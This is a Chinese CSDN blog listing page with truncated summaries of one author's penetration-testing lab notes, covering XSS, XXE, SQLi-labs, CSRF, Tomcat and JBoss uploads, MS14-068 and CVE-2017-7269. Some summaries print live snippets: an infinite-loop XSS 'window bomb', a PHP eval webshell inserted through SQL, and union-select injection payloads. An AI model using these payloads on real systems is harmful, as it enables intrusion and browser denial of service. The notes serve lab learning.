自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(26)
  • 收藏
  • 关注

原创 xss完成浏览器视窗炸弹

无聊,,,发个文章。这个就是很简单的视窗炸弹,放在自己的 xss平台上,执行就会一直打开页面。初学者可以 试一试。function WindowBomb(){var iCounter = 0 // dummy counterwhile (true){window.open(“https://blog.csdn.net/qfslyy/article/details/111664006?spm=1001.2014.3001.5501”,“CRASHING” + iCounter,“width=10

2022-02-18 00:54:24 323

原创 PHPstudy复现未知后缀情况只显示源码不解析

修改apahche配置文件将配置文件修改加入或删除 .phtml

2021-08-13 13:15:17 306

原创 安装docker,vulhub

1、sudo apt install apt-transport-https ca-certificates curl gnupg-agent software-properties-common2、curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -3、sudo echo “deb [arch=amd64] https://download.docker.com/linux/d

2021-01-07 17:07:21 298

原创 XXE

直接对服务器进行攻击的手段,XML外部(DTD)实体注入(XML文档,一种标签语言,作用是将数据,运行部分程序,对象,转换为xml格式存放,在别处调用时继续使用。有漏洞,可以写xml格式恶意代码让服务器执行。)怎么发现xxe:在xxe-lab举例使用xml文档时,使用恶意xml文档。<?xml version="1.0" encoding="UTF-8"?>%aaa;]>抓包,增加以上代码,http地址协商dnslog。cn的地址然年forward,刷新dnslogxx

2021-01-07 17:06:42 181

原创 BEES CMS 获取flag 命令执行漏洞

御剑扫出admin登录后台,出现一个flag基本信息:有一个flag上传一句话木马图片:抓包修改为php,蚁剑或菜刀连接 有个flag.php文件信息泄露包括源码泄露,配置等命令执行漏洞:(非代码执行)应用程序源代码功能实现需要执行系统命令的函数,如果命令连接符控制此函数,就能执行系统命令,。 &,| || 都可以作为连接符使用,如果没有对函数过滤,导致在没有绝对路径的情况下被执行。system (string KaTeX parse error: Expected 'EOF', got

2021-01-07 16:57:43 1749

原创 csrf跨站请求伪造

利用站点内的信任用户利用受信任网站。,web流程:发现xss漏洞,构造代码,发送受害人,受害人执行代码,完成攻击dvwa修改密码:受害者进入修改密码阶段攻击者构造链接或html文件:ip为受害者ip受害者点击后密码会被修改为链接内的密码。中级绕过referer,高级改token...

2021-01-07 15:43:17 154

原创 kali 复现apache httpd多后缀解析漏洞

1:安装docker:并启动下载vulhub2:载入镜像:登录确认:3:写一个php文件,改后缀为多后缀。4:单独上传php文件会被过滤,不允许商场php文件类型。上传多后缀文件:上传成功。访问:测试蚁剑连接:连接成功。...

2021-01-06 19:40:46 248

原创 sqli学习 (4)11 12关

11关:判断注人类型:输入‘报错,输入and1=2不报错,所以判读它是一个字符型注入输入‘ #时不报错,说明闭合符是’ 注释符需要用#或者-- +判断列数:在这三列中的一列查询其数据库名:查表名:’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’ #查一下users表的字段:’ union select 1,group_conc

2020-12-27 17:19:21 133 1

原创 sqli(5) 7,8关盲注

sql注入中有一种恶劣的情况是没有回显,这个时候就需要盲注:首先了解一下原理和盲注:需要将字母转换为数字,ascll码,使用ascii()函数,特性:可以与substr,length配合使用select length ascii(substr(‘abc’,1,1)); 字母ascii码范围: 65-122,使用二分法比较。举例1:查数据库长度:and length(database())>10查数据库字符:and ascii(substr(database(),1,1))>90测表

2020-12-26 21:22:21 184

原创 sql注入学习(3)第5和6关报错注入,

今天exp注入时发现数据库版本不对,老版本phpstudy不能换数据库版本,于是换了小皮,但是怎么都连不上数据库,最后发现时php版本忘换了,gan。先了解一下别的注入:exp和updatexmlexp:and exp(~(select xfrom(select x from x.x))x))第一关举例:使用这种方式获得数据库名。欧克了报错注入:updatexml(要操作的文件名,(构造一个xpath语法),新值)updatexml(1,(concat(0x23,(database())

2020-12-26 21:01:24 483

原创 在sqli labs 学习sql注入(2)(基础,1-4关详细步骤)

sql注入环境在学习1里已经搭建好了:sql注入至高原则!:能执行原理就不说了,只说实操主要流程:1:寻找注入点(测试注入点,判断闭合)主要是通过逻辑是和逻辑非进行判断。步骤Ⅰ: and 1=1能执行,不报错,1=2时如果与1=1页面一样的或者报错,那么我们需要进行闭合符测试,也就是‘,“,)及其组合。Ⅱ:测试到and 1=2时查不到数据了,为空,就是有可能是注入点,(因为1=2是逻辑非,当查不到数据的时候,就说明我们的逻辑非被执行了,)。看不懂就看下面流程。第三题对判断这个注入点闭合方式比

2020-12-24 16:12:08 494

原创 渗透测试的信息收集(未完)

笔记:分布式代理:请求行:请求头:post,user-agent(向网站发送浏览器和操作系统信息),cookie(cookie,),content-type谷歌语法,fofa,shodaninurlinurl:.php?idintitle:intext:“转到父目录” (目录遍历漏洞)filetypewordprss漏洞端口信息收集:nmap:-vv -ps -sv...

2020-12-24 12:53:18 111

原创 sql注入学习 1:安装sqli labs master

1安装phpstudy:2下载解压sqli-labs-master,放入phpstudy的www目录下3:访问本机地址即可:4如果出现来连接数据库错误,到这个文件里改一下数据库名和密码,改成自己的phpstudy数据库密码之后再登陆:到这个页面进行数据库重置:就可以开始注入练习了:...

2020-12-24 09:55:20 237

原创 burpsuit简单应用(抓包,回包,密码爆破及其四种模式)

1准备:网页设置代理为本地,可以自行选项配,推荐插件foxy,:2抓包:进入要抓包的网页后,代理设置完成,打开burpsuit在proxy下选择intercept ,开启监听。:接下来在网页进行的操作都会被截下。抓包内容:2:回包:对抓到的包右键点击:发送repeater后:点击go,即可获得回包。3:密码爆破:对抓到的登录界面的包进行右键点击发送到intruder:设置攻击目标IP,端口,本地默认即可:在Postion界面设置爆破点:首先clear,清掉

2020-12-23 19:01:52 7782

原创 复现phpstudy数据库探针过程获取sh

使用数据库将一句话发送到phpstudy本地进行连接原理。1:安装并打开phpstudy,启动服务:2:进入phpMyadmin数据库账户密码默认root,登录3:选择或者创建一个数据库:这里选择了test数据库,选择sql语句,执行以下命令:create table ma (cmd text NOT NULL);//创建名为ma的表,不能为空insert into ma (cmd) values ('<?php @eval($_POST[123])?>');//在ma表中插入一

2020-12-21 20:12:51 1329

原创 burpsuit爆破tomact账户密码(详细)

登录apache tomact:2:进行登陆操作并对此页面进行抓包:可以抓别的网站但是抓不住这个包的原因:需要在先开启监听,打开代理,然后点击登录,这时候会抓到第一个包,需要释放掉,这时会弹出登录,在随便输入,确定,这个时候就可以自动抓到包了设置爆破ip和端口:选中爆破点:设置payloads:需要注意的是,需要在url处取消=或者直接取消url编码:开始爆破:这就是我们的密码了:render访问:对密码进行64base解码得出密码:账户是liu密码是kun.

2020-12-21 19:05:45 420

原创 Jboss远程命令执行部署war包以及如何开启口令防御。

接上一个文章,另一种部署war包方式:远程命令执行部署war包,以及如何开启口令,提高安全。远程命令执行部署war:待定1:jbos exp防御,主要改三个地方1:定义用户密码的:2:改这个文件取消注释3:最下面取消security的注释。:重启服务之后,再次访问便需要口令了:...

2020-12-21 17:21:21 397

原创 jboss 远程连接以及未授权远程上传和访问war包

1:如果jboss启动不了,在环境变量里配一个jboss的系统变量。2:热部署文档位置:一般默认是无法外部访问的,会造成连接失败:可以修改下面的配置文件进行访问:修改为任意ip:这样之后可以在别的机器访问了在别的机器上开启phpstudy,登录jboos,远程访问:在这里上传war包,wai包在哪里就写那个ip,不是要上传过去的那个ip,http;//上传成功:就远程可以访问war包了:...

2020-12-21 16:26:53 485

原创 tomact之put任意文件上传,使用burpsuit抓包jsp马,错误分析

1:成功登录apache tomact:2:抓包:3:发送到repeater:4:更改为put上传:在下方加上jsp马内容,go即可上传成功jsp马只截了一部分,网上应该有很多。5:400错误:换物理机抓包上传试试6:403错误:7:409错误:可能是已经上传成功,或检查是否有重名文件...

2020-12-21 15:21:29 1101

原创 开启apache tomact服务并查看后台,与jdk环境变量配置

一:首先要配置jdk环境变量:安装jdk包之后,更改环境变量,选择计算机,属性,高级,环境变量,一共有三步:在系统变量新建 JAVA_HOME 变量 。变量值填写jdk的安装目录在寻找 Path 变量→编辑在变量值最后输入 %JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;注意分号相隔。最后再新建CLASSPATH:新建 CLASSPATH 变量变量值填写 .;%JAVA_HOME%\lib;%JAVA_HOME%\lib\tools.jar前面有一个点

2020-12-21 10:52:18 1324 3

原创 复现ms-14-068票据

**复现ms-14068票据注入提权步骤个人笔记,欢迎指导讨论**此时登录的用户是域里面的mmy用户查看本机SID查看域控计算机全名验证域成员是否能访问域控可以看到拒绝访问,域成员此时没有权限访问域控文件把相关工具包拖进来之后运用mimikatz工具清空它的票据,可以看到已经成功了接下来扫描ms14-068漏洞,查看系统是否打了补丁扫描结果什么都没有,所以确定没有打补丁,可以利用ms14-068漏洞进行攻击程序执行完成后,在ms14-068文件夹里生成了一个票据文件

2020-12-19 19:32:44 398 2

原创 centos单用户忘记密码,改密码,重置密码(一步一截图)

centos单用户重置密码在开机读秒根据提示,按e进入编辑界面时按任意键进入grub菜单选择第二项:内核,继续按e编辑结尾输入:[空格] 1[回车]回到菜单界面,按b启动启动后就会进入到单用户模式,可以使用passwd命令直接重置root用户密码密码重置成功,reboot重启...

2020-12-19 19:10:07 299 1

原创 winserver2008DHCP服务搭建

添加dhcp服务创建完成进入管理界面配置地址池之后直接release renew配置成功。关闭本机对vmare的dhcp服务

2020-12-19 18:55:59 202 1

原创 DNS服务搭建

DNS服务搭建在添加或删除程序中添加相关服务后,打开服务器管理首先添加dns服务器,以创建正向查找区域为例填写区域名称选择创建新文件填写本机ip地址进入dns服务管理建立主机和指针通过nslookup ip/域名 验证成功...

2020-12-19 18:48:43 109 1

原创 2003server服务器的IIS服务七项配置

完成IIS七项配置(修改端口、修改IP、修改主目录、开启目录浏览、关闭匿名访问、IP访问授权、修改默认文档IIS实验:在进行配置之前先安装服务:打开虚拟机,进入winserver2003,安装iis服务:进入应用程序服务器,详细信息:选择Iis信息服务,安装以下服务:安装完成后进入IIS信息服务管理器:进入管理器之后右击默认站点打开属性:在网站属性下可以修改网站端口,ip地址:在主目录上可以开启目录访问权限:在此出可以打开主目录,添加文本文档:或者修改我们的主目录:

2020-12-19 18:31:31 516

原创 cve-2017-7269

CEV-2017-7269(过程,步骤,说明)1、 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas)(只是个人学习笔记)在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas)之后需要将包引入到msf中:可以选择数据库方式,将cve包导入到msf中,也可以直接将包放在目录:/usr/share/metasploit-framework/modules/exploits/w

2020-12-19 18:11:53 2359 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除